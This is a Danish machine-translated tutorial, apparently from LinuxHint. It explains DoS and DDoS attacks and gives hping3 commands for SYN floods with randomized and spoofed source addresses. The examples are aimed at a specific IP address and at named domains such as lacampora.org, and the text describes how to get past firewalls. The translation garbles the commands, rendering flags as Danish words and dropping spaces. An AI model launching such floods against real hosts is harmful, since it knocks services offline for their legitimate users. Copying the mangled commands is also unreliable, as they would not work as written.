DOS angreb
Et Denial of Service (DOS) -angreb er en meget enkel teknik til at nægte adgang til tjenester (derfor kaldes det denial of service -angreb). Dette angreb består i at overbelaste målet med overdimensionerede pakker eller en stor mængde af dem.
Selvom dette angreb er meget let at udføre, kompromitterer det ikke informationens eller privatlivets fred for målet, det er ikke et penetrativt angreb og har kun til formål at forhindre adgang til målet.
Ved at sende en mængde pakker kan målet ikke håndtere angribere, der forhindrer serveren i at betjene legitime brugere.
DOS -angreb udføres fra en enkelt enhed, derfor er det let at stoppe dem ved at blokere angriberens IP, men alligevel kan angriberen ændre og endda forfalde (klone) mål -IP -adressen, men det er ikke svært for firewalls at håndtere sådanne angreb , i modsætning til hvad der sker med DDOS -angreb.
DDOS -angreb
Et Distributed Denial of Service -angreb (DDOS) ligner et DOS -angreb, men udføres fra forskellige noder (eller forskellige angribere) samtidigt. Normalt udføres DDOS -angreb af botnets. Botnet er automatiserede scripts eller programmer, der inficerer computere for at udføre en automatiseret opgave (i dette tilfælde et DDOS -angreb). En hacker kan oprette et botnet og inficere mange computere, hvorfra botnet vil starte DOS -angreb, det faktum, at mange botnet skyder samtidigt, gør DOS -angrebet til et DDOS -angreb (derfor kaldes det distribueret).
Selvfølgelig er der undtagelser, hvor DDOS -angreb blev udført af rigtige menneskelige angribere, for eksempel brugte hackergruppen Anonymous integreret af tusinder af mennesker over hele verden denne teknik meget ofte på grund af dens lette implementering (det krævede kun frivillige, der delte deres sag), det er for eksempel, hvordan Anonymous forlod Gaddafis libyske regering fuldstændig afbrudt under invasionen, den libyske stat blev efterladt forsvarsløs før tusinder af angribere fra hele verden.
Denne type angreb, når den udføres fra mange forskellige noder, er ekstremt vanskelig at forhindre og stoppe og normalt kræver særlig hardware at håndtere, det skyldes, at firewalls og defensive applikationer ikke er parate til at håndtere tusindvis af angribere samtidigt. Dette er ikke tilfældet med hping3, de fleste angreb udført gennem dette værktøj vil blive blokeret af defensive enheder eller software, men alligevel er det nyttigt i lokale netværk eller mod dårligt beskyttede mål.
Om hping3
Værktøjet hping3 giver dig mulighed for at sende manipulerede pakker. Dette værktøj giver dig mulighed for at styre størrelsen, mængden og fragmenteringen af pakker for at overbelaste målet og omgå eller angribe firewalls. Hping3 kan være nyttig til sikkerhed eller kapacitetstest, ved hjælp af det kan du teste firewalls effektivitet, og hvis en server kan håndtere en stor mængde pakker. Nedenfor finder du instruktioner om, hvordan du bruger hping3 til sikkerhedstestformål.
Kom godt i gang med DDOS -angreb ved hjælp af hping3:
På Debian og baserede Linux -distributioner kan du installere hping3 ved at køre:
#passendeinstallerehping3-og 
Et simpelt DOS (ikke DDOS) angreb ville være:
#sudohping3-S -flod -V -s 80170.155.9.185 
Hvor:
sudo: giver nødvendige privilegier til at køre hping3.
hping3: kalder programmet hping3.
-S: angiver SYN -pakker.
–Flod: skyde efter eget skøn, ignoreres svar (derfor bliver svar ikke vist), og pakker sendes hurtigt som muligt.
-V: Ordlighed.
-p 80: port 80, kan du erstatte dette nummer for den service, du vil angribe.
170.155.9.185: mål -IP.
Oversvømmelse ved hjælp af SYN -pakker mod port 80:
Følgende eksempel viser et SYN -angreb mod lacampora.org:
#sudohping3 lacampora.org-q -n -d 120 -S -s 80 -flod -mærke-kildeHvor:
Lacampora.org: er målet
-q: kort output
-n: vis mål -IP i stedet for vært.
-d 120: sæt pakkestørrelse
–Rand-source: skjul IP -adresse.
Følgende eksempel viser et andet eksempel på oversvømmelse:
SYN -oversvømmelse mod havn 80:
#sudohping3-mærke-kildeivan.com-S -q -s 80 -flod 
Med hping3 kan du også angribe dine mål med en falsk IP, for at omgå en firewall kan du endda klone din mål -IP selv eller enhver tilladt adresse, du måske kender (du kan f.eks. Opnå det med Nmap eller en sniffer til at lytte etableret forbindelser).
Syntaksen ville være:
#sudohping3-til <FAKE IP> <mål> -S -q -s 80 -hurtigere -c2I dette praktiske eksempel ser angrebet ud:
#sudohping3-til190.0.175.100 190.0.175.100-S -q -s 80 -hurtigere -c2 
Jeg håber, at du fandt denne vejledning om hping3 nyttig. Fortsæt med at følge LinuxHint for flere tips og opdateringer om Linux og netværk.